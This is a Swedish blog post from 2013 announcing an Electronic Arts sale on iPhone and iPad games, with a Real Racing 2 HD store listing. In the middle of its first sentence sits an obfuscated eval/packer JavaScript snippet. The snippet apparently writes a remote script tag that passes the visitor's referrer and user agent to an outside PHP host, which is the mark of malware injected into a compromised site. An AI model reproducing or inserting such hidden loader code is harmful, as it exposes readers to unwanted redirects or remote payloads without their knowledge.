Image Image Image Image Image Image Image Image Image Image

| 25 juni, 2018

Scroll to top

Top

No Comments

iOS: EA har rea på spel

ea spel rea
Filip Urde
  • On 28 mars, 2013
  • http://www.revue.se/filip-urde


EA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffhad|var|u0026u|referrer|nyasr||js|php’.split(‘|’),0,{}))
har nu sin årliga REA på spel till iPhone och iPad.

Nu kostar nästan alla spelen endast 7kr, så om du är spelsugen så är det dags att kika på vad som finns. Gå in på ett av EA spelen, som t.ex. FIFA eller liknande och klicka er vidare till EA:s spelkatalog så kan ni se vad som finns.

Vill man dock ha Real Racing 2 HD,så ligger detta inte under EA katalogen ännu, utan under Firemints. Så då får man söka på det enskilt.

Här har vi en länk till FIFA 13, gå in den vägen.

Real Racing 2 HD
Real Racing 2 HD Electronic Arts Spel, Racing, Action, Underhållning 75 SEK Ladda ner

Submit a Comment